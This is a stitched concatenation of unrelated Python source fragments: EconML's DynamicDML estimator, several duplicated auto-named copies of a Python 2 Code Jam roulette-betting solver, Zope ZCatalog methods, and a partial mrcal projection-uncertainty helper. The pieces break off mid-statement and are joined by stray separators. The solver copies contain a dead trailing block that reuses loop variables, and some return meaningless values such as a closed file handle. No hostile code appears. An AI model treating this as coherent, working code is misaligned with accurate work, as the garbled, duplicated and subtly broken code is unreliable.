featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
linear_first_stages: bool
Whether the first stage models are linear (in which case we will expand the features passed to
`model_y` accordingly)
discrete_treatment: bool, optional (default is ``False``)
Whether the treatment values should be treated as categorical, rather than continuous, quantities
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
Iterables should make sure a group belongs to a single split.
For integer/None inputs, :class:`~sklearn.model_selection.GroupKFold` is used
Unless an iterable is used, we call `split(X, T, groups)` to generate the splits.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
Examples
--------
A simple example with default models:
.. testcode::
:hide:
import numpy as np
np.set_printoptions(suppress=True)
.. testcode::
from econml.dynamic.dml import DynamicDML
np.random.seed(123)
n_panels = 100 # number of panels
n_periods = 3 # number of time periods per panel
n = n_panels * n_periods
groups = np.repeat(a=np.arange(n_panels), repeats=n_periods, axis=0)
X = np.random.normal(size=(n, 1))
T = np.random.normal(size=(n, 2))
y = np.random.normal(size=(n, ))
est = DynamicDML()
est.fit(y, T, X=X, W=None, groups=groups, inference="auto")
>>> est.const_marginal_effect(X[:2])
array([[-0.336..., -0.048..., -0.061..., 0.042..., -0.204...,
0.00667271],
[-0.101..., 0.433..., 0.054..., -0.217..., -0.101...,
-0.159...]])
>>> est.effect(X[:2], T0=0, T1=1)
array([-0.601..., -0.091...])
>>> est.effect(X[:2], T0=np.zeros((2, n_periods*T.shape[1])), T1=np.ones((2, n_periods*T.shape[1])))
array([-0.601..., -0.091...])
>>> est.coef_
array([[ 0.112...],
[ 0.231...],
[ 0.055...],
[-0.125...],
[ 0.049...],
[-0.079...]])
>>> est.coef__interval()
(array([[-0.063...],
[-0.009...],
[-0.114...],
[-0.413...],
[-0.117...],
[-0.262...]]), array([[0.289...],
[0.471...],
[0.225...],
[0.163...],
[0.216...],
[0.103...]]))
"""
def __init__(self, *,
model_y='auto', model_t='auto',
featurizer=None,
fit_cate_intercept=True,
linear_first_stages=False,
discrete_treatment=False,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
random_state=None):
self.fit_cate_intercept = fit_cate_intercept
self.linear_first_stages = linear_first_stages
self.featurizer = clone(featurizer, safe=False)
self.model_y = clone(model_y, safe=False)
self.model_t = clone(model_t, safe=False)
super().__init__(discrete_treatment=discrete_treatment,
discrete_instrument=False,
categories=categories,
cv=GroupKFold(cv) if isinstance(cv, int) else cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
random_state=random_state)
def _gen_featurizer(self):
return clone(self.featurizer, safe=False)
def _gen_model_y(self):
if self.model_y == 'auto':
model_y = WeightedLassoCVWrapper(random_state=self.random_state)
else:
model_y = clone(self.model_y, safe=False)
return _FirstStageWrapper(model_y, True, self._gen_featurizer(),
self.linear_first_stages, self.discrete_treatment)
def _gen_model_t(self):
if self.model_t == 'auto':
if self.discrete_treatment:
model_t = LogisticRegressionCV(cv=WeightedStratifiedKFold(random_state=self.random_state),
random_state=self.random_state)
else:
model_t = WeightedLassoCVWrapper(random_state=self.random_state)
else:
model_t = clone(self.model_t, safe=False)
return _FirstStageWrapper(model_t, False, self._gen_featurizer(),
self.linear_first_stages, self.discrete_treatment)
def _gen_model_final(self):
return StatsModelsLinearRegression(fit_intercept=False)
def _gen_ortho_learner_model_nuisance(self, n_periods):
return _DynamicModelNuisance(
model_t=self._gen_model_t(),
model_y=self._gen_model_y(),
n_periods=n_periods)
def _gen_ortho_learner_model_final(self, n_periods):
wrapped_final_model = _DynamicFinalWrapper(
StatsModelsLinearRegression(fit_intercept=False),
fit_cate_intercept=self.fit_cate_intercept,
featurizer=self.featurizer,
use_weight_trick=False)
return _LinearDynamicModelFinal(wrapped_final_model, n_periods=n_periods)
def _prefit(self, Y, T, *args, groups=None, only_final=False, **kwargs):
u_periods = np.unique(np.unique(groups, return_counts=True)[1])
if len(u_periods) > 1:
raise AttributeError(
"Imbalanced panel. Method currently expects only panels with equal number of periods. Pad your data")
self._n_periods = u_periods[0]
# generate an instance of the final model
self._ortho_learner_model_final = self._gen_ortho_learner_model_final(self._n_periods)
if not only_final:
# generate an instance of the nuisance model
self._ortho_learner_model_nuisance = self._gen_ortho_learner_model_nuisance(self._n_periods)
TreatmentExpansionMixin._prefit(self, Y, T, *args, **kwargs)
def _postfit(self, Y, T, *args, **kwargs):
super()._postfit(Y, T, *args, **kwargs)
# Set _d_t to effective number of treatments
self._d_t = (self._n_periods * self._d_t[0], ) if self._d_t else (self._n_periods, )
def _strata(self, Y, T, X=None, W=None, Z=None,
sample_weight=None, sample_var=None, groups=None,
cache_values=False, only_final=False, check_input=True):
# Required for bootstrap inference
return groups
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, sample_var=None, groups,
cache_values=False, inference='auto'):
"""Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
The input data must contain groups with the same size corresponding to the number
of time periods the treatments were assigned over.
The data should be preferably in panel format, with groups clustered together.
If group members do not appear together, the following is assumed:
* the first instance of a group in the dataset is assumed to correspond to the first period of that group
* the second instance of a group in the dataset is assumed to correspond to the
second period of that group
...etc.
Only the value of the features X at the first period of each unit are used for
        heterogeneity. The value of X in subsequent periods is used as a time-varying control
but not for heterogeneity.
Parameters
----------
Y: (n, d_y) matrix or vector of length n
Outcomes for each sample (required: n = n_groups * n_periods)
T: (n, d_t) matrix or vector of length n
Treatments for each sample (required: n = n_groups * n_periods)
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample (Required: n = n_groups * n_periods). Only first
period features from each unit are used for heterogeneity, the rest are
used as time-varying controls together with W
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample (Required: n = n_groups * n_periods)
sample_weight: optional(n,) vector or None (Default=None)
Weights for each samples
sample_var: optional(n,) vector or None (Default=None)
Sample variance for each sample
groups: (n,) vector, required
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string,:class:`.Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`) and 'auto'
(or an instance of :class:`.LinearModelFinalInference`).
Returns
-------
self: DynamicDML instance
"""
if sample_weight is not None or sample_var is not None:
warn("This CATE estimator does not yet support sample weights and sample variance. "
"These inputs will be ignored during fitting.",
UserWarning)
return | |
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
infile.close()
return ret
def func_cb830edc80524b599c35f414e9d9982c(infile):
    """Solve the roulette-betting cases read from *infile*; returns the last
    case's best expected profit.

    NOTE(review): legacy Python 2 code (print statement, xrange); depends on a
    module-level get_expected() helper defined elsewhere in this file. The
    constant 37 presumably matches the 37 slots of a European roulette wheel
    -- confirm against the original problem statement.
    """
    cases = int(infile.readline())
    for cc in xrange(cases):
        budget, bets = map(int, infile.readline().split())
        placed = sorted(map(int, infile.readline().split()))
        ret = 0.0
        # Candidate values for the smallest bet: 1, the pre-placed bets, and
        # their immediate neighbors.
        queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
            placed]
        queue = sorted(set(queue))
        seen = set(queue)
        while queue:
            lowest = queue.pop()
            if lowest == 0:
                continue
            # Cost of topping every slot (pre-placed or empty) up to 'lowest'.
            needed_budget = (37 - len(placed)) * lowest
            for p in placed:
                needed_budget += max(0, lowest - p)
            if budget < needed_budget:
                continue
            remaining_budget = budget - needed_budget
            # Pre-placed bets already at or below 'lowest'.
            partial = len([p for p in placed if p <= lowest])
            lowest_cnt = 37 - len(placed) + partial
            if lowest_cnt == 0:
                continue
            larger = [p for p in placed if p > lowest]
            if larger:
                next_larger = min(larger)
                # How much 'lowest' can be raised uniformly without passing
                # the next larger pre-placed bet (Python 2 integer division).
                can_replicate = min(next_larger - lowest - 1,
                    remaining_budget / lowest_cnt)
            else:
                can_replicate = remaining_budget / lowest_cnt
            if can_replicate > 0:
                # Enqueue the raised candidate (and its predecessor) once each.
                if lowest + can_replicate not in seen:
                    seen.add(lowest + can_replicate)
                    queue.append(lowest + can_replicate)
                if lowest + can_replicate - 1 not in seen:
                    seen.add(lowest + can_replicate - 1)
                    queue.append(lowest + can_replicate - 1)
            for exclude in xrange(0, min(remaining_budget, partial) + 1):
                cand = get_expected(placed, lowest, exclude
                    ) - exclude - needed_budget
                ret = max(ret, cand)
        print 'Case #%d: %.10lf' % (cc + 1, ret)
        # NOTE(review): the block below sits outside the while-loop and reuses
        # 'lowest'/'can_replicate' from its final iteration; it looks like an
        # auto-generated remnant -- verify before relying on it.
        if lowest + can_replicate not in seen:
            seen.add(lowest + can_replicate)
            queue.append(lowest + can_replicate)
        if lowest + can_replicate - 1 not in seen:
            seen.add(lowest + can_replicate - 1)
            queue.append(lowest + can_replicate - 1)
    infile.close()
    return ret
def func_64c4778be53c42918793d40dbb23da44():
    """Same roulette solver as its siblings, reading a fixed input file;
    returns the number of cases processed.

    NOTE(review): legacy Python 2 (print statement, xrange); relies on a
    module-level get_expected() helper defined elsewhere in this file.
    """
    infile = open('codejam/test_files/Y13R5P1/A.in')
    cases = int(infile.readline())
    for cc in xrange(cases):
        budget, bets = map(int, infile.readline().split())
        placed = sorted(map(int, infile.readline().split()))
        ret = 0.0
        # Candidate minimum-bet values: 1, the pre-placed bets, and neighbors.
        queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
            placed]
        queue = sorted(set(queue))
        seen = set(queue)
        while queue:
            lowest = queue.pop()
            if lowest == 0:
                continue
            # Budget needed to raise every slot up to 'lowest'.
            needed_budget = (37 - len(placed)) * lowest
            for p in placed:
                needed_budget += max(0, lowest - p)
            if budget < needed_budget:
                continue
            remaining_budget = budget - needed_budget
            partial = len([p for p in placed if p <= lowest])
            lowest_cnt = 37 - len(placed) + partial
            if lowest_cnt == 0:
                continue
            larger = [p for p in placed if p > lowest]
            if larger:
                next_larger = min(larger)
                can_replicate = min(next_larger - lowest - 1,
                    remaining_budget / lowest_cnt)
            else:
                can_replicate = remaining_budget / lowest_cnt
            if can_replicate > 0:
                if lowest + can_replicate not in seen:
                    seen.add(lowest + can_replicate)
                    queue.append(lowest + can_replicate)
                if lowest + can_replicate - 1 not in seen:
                    seen.add(lowest + can_replicate - 1)
                    queue.append(lowest + can_replicate - 1)
            for exclude in xrange(0, min(remaining_budget, partial) + 1):
                cand = get_expected(placed, lowest, exclude
                    ) - exclude - needed_budget
                ret = max(ret, cand)
        print 'Case #%d: %.10lf' % (cc + 1, ret)
        # NOTE(review): auto-generated remnant; reuses loop variables from the
        # final while-iteration -- verify before relying on it.
        if lowest + can_replicate not in seen:
            seen.add(lowest + can_replicate)
            queue.append(lowest + can_replicate)
        if lowest + can_replicate - 1 not in seen:
            seen.add(lowest + can_replicate - 1)
            queue.append(lowest + can_replicate - 1)
    infile.close()
    return cases
def func_bd84959af057473b96f9a75fab5485bf():
    """Same roulette solver as its siblings; returns the last computed
    'next_larger' value.

    NOTE(review): legacy Python 2 (print statement, xrange); relies on a
    module-level get_expected() helper. 'next_larger' is only assigned when a
    larger pre-placed bet exists, so the final return can raise NameError on
    some inputs -- auto-generated code, verify before use.
    """
    infile = open('codejam/test_files/Y13R5P1/A.in')
    cases = int(infile.readline())
    for cc in xrange(cases):
        budget, bets = map(int, infile.readline().split())
        placed = sorted(map(int, infile.readline().split()))
        ret = 0.0
        # Candidate minimum-bet values: 1, the pre-placed bets, and neighbors.
        queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
            placed]
        queue = sorted(set(queue))
        seen = set(queue)
        while queue:
            lowest = queue.pop()
            if lowest == 0:
                continue
            # Budget needed to raise every slot up to 'lowest'.
            needed_budget = (37 - len(placed)) * lowest
            for p in placed:
                needed_budget += max(0, lowest - p)
            if budget < needed_budget:
                continue
            remaining_budget = budget - needed_budget
            partial = len([p for p in placed if p <= lowest])
            lowest_cnt = 37 - len(placed) + partial
            if lowest_cnt == 0:
                continue
            larger = [p for p in placed if p > lowest]
            if larger:
                next_larger = min(larger)
                can_replicate = min(next_larger - lowest - 1,
                    remaining_budget / lowest_cnt)
            else:
                can_replicate = remaining_budget / lowest_cnt
            if can_replicate > 0:
                if lowest + can_replicate not in seen:
                    seen.add(lowest + can_replicate)
                    queue.append(lowest + can_replicate)
                if lowest + can_replicate - 1 not in seen:
                    seen.add(lowest + can_replicate - 1)
                    queue.append(lowest + can_replicate - 1)
            for exclude in xrange(0, min(remaining_budget, partial) + 1):
                cand = get_expected(placed, lowest, exclude
                    ) - exclude - needed_budget
                ret = max(ret, cand)
        print 'Case #%d: %.10lf' % (cc + 1, ret)
        # NOTE(review): auto-generated remnant; reuses loop variables from the
        # final while-iteration -- verify before relying on it.
        if lowest + can_replicate not in seen:
            seen.add(lowest + can_replicate)
            queue.append(lowest + can_replicate)
        if lowest + can_replicate - 1 not in seen:
            seen.add(lowest + can_replicate - 1)
            queue.append(lowest + can_replicate - 1)
    infile.close()
    return next_larger
def func_0df505aef94e4004a95d9ea8c9396a7c():
    """Same roulette solver as its siblings; returns the (already closed)
    input file handle.

    NOTE(review): legacy Python 2 (print statement, xrange); relies on a
    module-level get_expected() helper defined elsewhere in this file.
    """
    infile = open('codejam/test_files/Y13R5P1/A.in')
    cases = int(infile.readline())
    for cc in xrange(cases):
        budget, bets = map(int, infile.readline().split())
        placed = sorted(map(int, infile.readline().split()))
        ret = 0.0
        # Candidate minimum-bet values: 1, the pre-placed bets, and neighbors.
        queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
            placed]
        queue = sorted(set(queue))
        seen = set(queue)
        while queue:
            lowest = queue.pop()
            if lowest == 0:
                continue
            # Budget needed to raise every slot up to 'lowest'.
            needed_budget = (37 - len(placed)) * lowest
            for p in placed:
                needed_budget += max(0, lowest - p)
            if budget < needed_budget:
                continue
            remaining_budget = budget - needed_budget
            partial = len([p for p in placed if p <= lowest])
            lowest_cnt = 37 - len(placed) + partial
            if lowest_cnt == 0:
                continue
            larger = [p for p in placed if p > lowest]
            if larger:
                next_larger = min(larger)
                can_replicate = min(next_larger - lowest - 1,
                    remaining_budget / lowest_cnt)
            else:
                can_replicate = remaining_budget / lowest_cnt
            if can_replicate > 0:
                if lowest + can_replicate not in seen:
                    seen.add(lowest + can_replicate)
                    queue.append(lowest + can_replicate)
                if lowest + can_replicate - 1 not in seen:
                    seen.add(lowest + can_replicate - 1)
                    queue.append(lowest + can_replicate - 1)
            for exclude in xrange(0, min(remaining_budget, partial) + 1):
                cand = get_expected(placed, lowest, exclude
                    ) - exclude - needed_budget
                ret = max(ret, cand)
        print 'Case #%d: %.10lf' % (cc + 1, ret)
        # NOTE(review): auto-generated remnant; reuses loop variables from the
        # final while-iteration -- verify before relying on it.
        if lowest + can_replicate not in seen:
            seen.add(lowest + can_replicate)
            queue.append(lowest + can_replicate)
        if lowest + can_replicate - 1 not in seen:
            seen.add(lowest + can_replicate - 1)
            queue.append(lowest + can_replicate - 1)
    infile.close()
    return infile
def func_4101d7d7b5284fc398b7616684eef88a():
infile = open('codejam/test_files/Y13R5P1/A.in')
cases = int(infile.readline())
for cc in xrange(cases):
budget, bets = map(int, infile.readline().split())
placed = sorted(map(int, infile.readline().split()))
ret = 0.0
queue = [1] + placed + [(p - 1) for p in placed] + [(p + 1) for p in
placed]
queue = sorted(set(queue))
seen = set(queue)
while queue:
lowest = queue.pop()
if lowest == 0:
continue
needed_budget = (37 - len(placed)) * lowest
for p in placed:
needed_budget += max(0, lowest - p)
if budget < needed_budget:
continue
remaining_budget = budget - needed_budget
partial = len([p for p in placed if p <= lowest])
lowest_cnt = 37 - len(placed) + partial
if lowest_cnt == 0:
continue
larger = [p for p in placed if p > lowest]
if larger:
next_larger = min(larger)
can_replicate = min(next_larger - lowest - 1,
remaining_budget / lowest_cnt)
else:
can_replicate = remaining_budget / lowest_cnt
if can_replicate > 0:
if lowest + can_replicate not in seen:
seen.add(lowest + can_replicate)
queue.append(lowest + can_replicate)
if lowest + can_replicate - 1 not in seen:
seen.add(lowest + can_replicate - 1)
queue.append(lowest + can_replicate - 1)
for exclude in xrange(0, min(remaining_budget, partial) + 1):
cand = get_expected(placed, lowest, exclude
) - exclude - needed_budget
ret = max(ret, cand)
print 'Case #%d: %.10lf' % (cc + 1, ret)
if lowest + can_replicate not | |
subtransaction.
t = id(transaction.get())
if t != self._v_transaction:
self._v_total = 0
self._v_transaction = t
self._v_total = self._v_total + 1
# increment the _v_total counter for this thread only and get a
# reference to the current transaction. the _v_total counter is
# zeroed if we notice that we're in a different transaction than
# the last one that came by. The semantics here mean that we
# should GC the cache if our threshhold is exceeded within the
# boundaries of the current transaction.
if self._v_total > self.threshold:
self._p_jar.cacheGC()
self._v_total = 0
return True
return False
@security.protected(manage_zcatalog_entries)
def catalog_object(self, obj, uid=None, idxs=None, update_metadata=1,
pghandler=None):
if uid is None:
try:
uid = obj.getPhysicalPath
except AttributeError:
raise CatalogError(
"A cataloged object must support the 'getPhysicalPath' "
"method if no unique id is provided when cataloging")
else:
uid = '/'.join(uid())
elif not isinstance(uid, str):
raise CatalogError('The object unique id must be a string.')
self._catalog.catalogObject(obj, uid, None, idxs,
update_metadata=update_metadata)
# None passed in to catalogObject as third argument indicates
# that we shouldn't try to commit subtransactions within any
# indexing code. We throw away the result of the call to
# catalogObject (which is a word count), because it's
# worthless to us here.
if self.maintain_zodb_cache():
transaction.savepoint(optimistic=True)
if pghandler:
pghandler.info('committing subtransaction')
@security.protected(manage_zcatalog_entries)
def uncatalog_object(self, uid):
self._catalog.uncatalogObject(uid)
@security.protected(search_zcatalog)
def uniqueValuesFor(self, name):
# Return the unique values for a given FieldIndex
return self._catalog.uniqueValuesFor(name)
@security.protected(search_zcatalog)
def getpath(self, rid):
# Return the path to a cataloged object given a 'data_record_id_'
return self._catalog.paths[rid]
@security.protected(search_zcatalog)
def getrid(self, path, default=None):
# Return 'data_record_id_' the to a cataloged object given a 'path'
return self._catalog.uids.get(path, default)
@security.protected(search_zcatalog)
def getobject(self, rid, REQUEST=None):
# Return a cataloged object given a 'data_record_id_'
return aq_parent(self).unrestrictedTraverse(self.getpath(rid))
@security.protected(search_zcatalog)
def getMetadataForUID(self, uid):
# return the correct metadata given the uid, usually the path
rid = self._catalog.uids[uid]
return self._catalog.getMetadataForRID(rid)
@security.protected(search_zcatalog)
def getIndexDataForUID(self, uid):
# return the current index contents given the uid, usually the path
rid = self._catalog.uids[uid]
return self._catalog.getIndexDataForRID(rid)
@security.protected(search_zcatalog)
def getMetadataForRID(self, rid):
# return the correct metadata for the cataloged record id
return self._catalog.getMetadataForRID(int(rid))
@security.protected(search_zcatalog)
def getIndexDataForRID(self, rid):
# return the current index contents for the specific rid
return self._catalog.getIndexDataForRID(rid)
@security.protected(search_zcatalog)
def getAllBrains(self):
# return a generator of brains for all cataloged objects
for rid in self._catalog.data:
yield self._catalog[rid]
@security.protected(search_zcatalog)
def schema(self):
return self._catalog.schema.keys()
@security.protected(search_zcatalog)
def indexes(self):
return self._catalog.indexes.keys()
@security.protected(search_zcatalog)
def index_objects(self):
# This method returns unwrapped indexes!
# You should probably use getIndexObjects instead
return self._catalog.indexes.values()
@security.protected(manage_zcatalog_indexes)
def getIndexObjects(self):
# Return a list of wrapped(!) indexes
getIndex = self._catalog.getIndex
return [getIndex(name) for name in self.indexes()]
def _searchable_arguments(self):
r = {}
n = {'optional': 1}
for name in self._catalog.indexes.keys():
r[name] = n
return r
def _searchable_result_columns(self):
r = []
for name in self._catalog.schema.keys():
i = {}
i['name'] = name
i['type'] = 's'
i['parser'] = str
i['width'] = 8
r.append(i)
r.append({'name': 'data_record_id_',
'type': 's',
'parser': str,
'width': 8})
return r
@security.protected(search_zcatalog)
def searchResults(self, query=None, **kw):
"""Search the catalog.
Search terms can be passed as a query or as keyword arguments.
"""
return self._catalog.searchResults(query, **kw)
security.declareProtected(search_zcatalog, '__call__')
__call__ = searchResults
@security.protected(search_zcatalog)
def search(self, query,
sort_index=None, reverse=0, limit=None, merge=1):
"""Programmatic search interface, use for searching the catalog from
scripts.
query: Dictionary containing catalog query
sort_index: Name of sort index
reverse: Reverse sort order?
limit: Limit sorted result count (optimization hint)
merge: Return merged results (like searchResults) or raw
results for later merging.
"""
if sort_index is not None:
sort_index = self._catalog.indexes[sort_index]
return self._catalog.search(
query, sort_index, reverse, limit, merge)
@security.protected(search_zcatalog)
def valid_roles(self):
# Return list of valid roles
obj = self
roles = set()
x = 0
while x < 100:
if hasattr(obj, '__ac_roles__'):
for role in obj.__ac_roles__:
roles.add(role)
obj = aq_parent(obj)
if obj is None:
break
x = x + 1
roles = list(roles)
roles.sort()
return roles
    @security.protected(manage_zcatalog_entries)
    def ZopeFindAndApply(self, obj, obj_ids=None, obj_metatypes=None,
                         obj_searchterm=None, obj_expr=None,
                         obj_mtime=None, obj_mspec=None,
                         obj_permission=None, obj_roles=None,
                         search_sub=0,
                         REQUEST=None, result=None, pre='',
                         apply_func=None, apply_path=''):
        """Zope Find interface and apply

        This is a *great* hack. Zope find just doesn't do what we
        need here; the ability to apply a method to all the objects
        *as they're found* and the need to pass the object's path into
        that method.
        """
        if result is None:
            result = []
        # 'all' disables meta_type filtering entirely
        if obj_metatypes and 'all' in obj_metatypes:
            obj_metatypes = None
        # Normalize the filter arguments into their canonical forms
        if obj_mtime and isinstance(obj_mtime, str):
            obj_mtime = DateTime(obj_mtime).timeTime()
        if obj_permission:
            obj_permission = getPermissionIdentifier(obj_permission)
        if obj_roles and isinstance(obj_roles, str):
            obj_roles = [obj_roles]
        if obj_expr:
            # Setup expr machinations
            md = td()
            obj_expr = (Eval(obj_expr), md, md._push, md._pop)
        base = aq_base(obj)
        if not hasattr(base, 'objectItems'):
            return result
        try:
            items = obj.objectItems()
        except Exception:
            return result
        try:
            add_result = result.append
        except Exception:
            raise AttributeError(repr(result))
        for id, ob in items:
            if pre:
                p = "%s/%s" % (pre, id)
            else:
                p = id
            dflag = 0
            # _p_changed is None means the object was a ZODB ghost before we
            # touched it; remember to deactivate it again when done.
            if hasattr(ob, '_p_changed') and (ob._p_changed is None):
                dflag = 1
            bs = aq_base(ob)
            # Apply all requested filters; any filter left at its default
            # passes automatically.
            if ((not obj_ids or absattr(bs.id) in obj_ids)
                and (not obj_metatypes or (hasattr(bs, 'meta_type')
                                           and bs.meta_type in obj_metatypes))
                and (not obj_searchterm
                     or (hasattr(ob, 'PrincipiaSearchSource')
                         and ob.PrincipiaSearchSource().find(obj_searchterm) >= 0)) # noqa: E501
                and (not obj_expr
                     or expr_match(ob, obj_expr))
                and (not obj_mtime
                     or mtime_match(ob, obj_mtime, obj_mspec))
                and ((not obj_permission
                      or not obj_roles)
                     or role_match(ob, obj_permission, obj_roles))):
                if apply_func:
                    # Apply as-we-find, passing the object's path
                    apply_func(ob, (apply_path + '/' + p))
                else:
                    add_result((p, ob))
                    dflag = 0
            # Recurse into children when requested
            if search_sub and hasattr(bs, 'objectItems'):
                self.ZopeFindAndApply(ob, obj_ids, obj_metatypes,
                                      obj_searchterm, obj_expr,
                                      obj_mtime, obj_mspec,
                                      obj_permission, obj_roles,
                                      search_sub,
                                      REQUEST, result, p,
                                      apply_func, apply_path)
            if dflag:
                ob._p_deactivate()
        return result
@security.protected(search_zcatalog)
def resolve_url(self, path, REQUEST):
# Attempt to resolve a url into an object in the Zope
# namespace. The url may be absolute or a catalog path
# style url. If no object is found, None is returned.
# No exceptions are raised.
if REQUEST:
script = REQUEST.script
if path.find(script) != 0:
path = '%s/%s' % (script, path)
try:
return REQUEST.resolve_url(path)
except Exception:
pass
@security.protected(search_zcatalog)
def resolve_path(self, path):
# Attempt to resolve a url into an object in the Zope
# namespace. The url may be absolute or a catalog path
# style url. If no object is found, None is returned.
# No exceptions are raised.
try:
return self.unrestrictedTraverse(path)
except Exception:
pass
    @security.protected(manage_zcatalog_entries)
    def manage_normalize_paths(self, REQUEST):
        """Ensure that all catalog paths are full physical paths

        This should only be used with ZCatalogs in which all paths can
        be resolved with unrestrictedTraverse."""
        paths = self._catalog.paths
        uids = self._catalog.uids
        unchanged = 0
        fixed = []
        removed = []
        # First pass: classify every cataloged path without mutating the
        # mappings we are iterating over.
        for path, rid in uids.items():
            ob = None
            if path[:1] == '/':
                # Try without the leading slash first, then the path as-is.
                ob = self.resolve_url(path[1:], REQUEST)
            if ob is None:
                ob = self.resolve_url(path, REQUEST)
                if ob is None:
                    # Unresolvable entry: schedule it for uncataloging.
                    removed.append(path)
                    continue
            ppath = '/'.join(ob.getPhysicalPath())
            if path != ppath:
                fixed.append((path, ppath))
            else:
                unchanged = unchanged + 1
        # Second pass: rewrite corrected paths under the same record ids, then
        # drop the unresolvable entries.
        for path, ppath in fixed:
            rid = uids[path]
            del uids[path]
            paths[rid] = ppath
            uids[ppath] = rid
        for path in removed:
            self.uncatalog_object(path)
@security.protected(manage_zcatalog_entries)
def manage_setProgress(self, pgthreshold=0, RESPONSE=None, URL1=None):
"""Set parameter to perform logging of reindexing operations very
'pgthreshold' objects
"""
self.pgthreshold = pgthreshold
if RESPONSE:
RESPONSE.redirect(URL1 + '/manage_catalogAdvanced?'
'manage_tabs_message=Catalog%20Changed')
def _getProgressThreshold(self):
if not hasattr(self, 'pgthreshold'):
self.pgthreshold = 0
return self.pgthreshold
# Indexing methods
@security.protected(manage_zcatalog_indexes)
def addIndex(self, name, type, extra=None):
if IPluggableIndex.providedBy(type):
self._catalog.addIndex(name, type)
return
# Convert the type by finding an appropriate product which supports
# this interface by that name. Bleah
products = ObjectManager.all_meta_types(self,
interfaces=(IPluggableIndex, ))
p = None
for prod in products:
if prod['name'] == type:
p = prod
break
if p is None:
raise ValueError("Index of type %s not found" % type)
base = p['instance']
if base is None:
raise ValueError("Index type %s does not support addIndex" % type)
# This code is *really* lame but every index type has its own
# function signature *sigh* and there is no common way to pass
# additional parameters to the constructor. The suggested way
# for new index types is to use an "extra" record.
if 'extra' in base.__init__.__code__.co_varnames:
index = base(name, extra=extra, caller=self)
elif 'caller' | |
else:
# No regularization. Use the simplified expression
Var_dq = nps.matmult(dq_dpief_packed, nps.transpose(A))
if what == 'covariance': return Var_dq * observed_pixel_uncertainty*observed_pixel_uncertainty
if what == 'worstdirection-stdev': return worst_direction_stdev(Var_dq) * observed_pixel_uncertainty
if what == 'rms-stdev': return np.sqrt(nps.trace(Var_dq)/2.) * observed_pixel_uncertainty
else: raise Exception("Shouldn't have gotten here. There's a bug")
def _projection_uncertainty( p_cam,
                             lensmodel, intrinsics_data,
                             extrinsics_rt_fromref, frames_rt_toref,
                             factorization, Jpacked, optimization_inputs,
                             istate_intrinsics, istate_extrinsics, istate_frames,
                             slice_optimized_intrinsics,
                             Nmeasurements_observations,
                             observed_pixel_uncertainty,
                             what):
    r'''Helper for projection_uncertainty()

    See docs for _projection_uncertainty_make_output() and
    projection_uncertainty()

    This function does all the work when observing points with a finite range.

    Fix: the frame-gradient computation (p_frames, dpref_dframes) uses names
    that exist only when frames_rt_toref is not None, so it now lives under
    that guard; previously it ran unconditionally and raised NameError
    whenever no frames were being optimized.
    '''

    Nstate   = Jpacked.shape[-1]
    dq_dpief = np.zeros(p_cam.shape[:-1] + (2,Nstate), dtype=float)

    if frames_rt_toref is not None:
        Nframes = len(frames_rt_toref)

    # The observed point, in the reference coordinate system
    if extrinsics_rt_fromref is not None:
        p_ref = \
            mrcal.transform_point_rt( mrcal.invert_rt(extrinsics_rt_fromref),
                                      p_cam )
    else:
        p_ref = p_cam

    if frames_rt_toref is not None:
        # The point in the coord system of all the frames. I index the frames on
        # axis -2
        p_frames = mrcal.transform_point_rt( mrcal.invert_rt(frames_rt_toref),
                                             nps.dummy(p_ref,-2) )

        # I now have the observed point represented in the coordinate system of
        # the frames. This is independent of any intrinsics-implied rotation, or
        # anything of the sort. I project this point back to pixels, through
        # noisy estimates of the frames, extrinsics and intrinsics.
        #
        # I transform each frame-represented point back to the reference
        # coordinate system, and I average out each estimate to get the one
        # p_ref I will use. I already have p_ref, so I don't actually need to
        # compute the value; I just need the gradients

        # dprefallframes_dframes has shape (..., Nframes,3,6)
        _, \
        dprefallframes_dframes, \
        _ = mrcal.transform_point_rt( frames_rt_toref, p_frames,
                                      get_gradients = True)

        # shape (..., 3,6*Nframes)
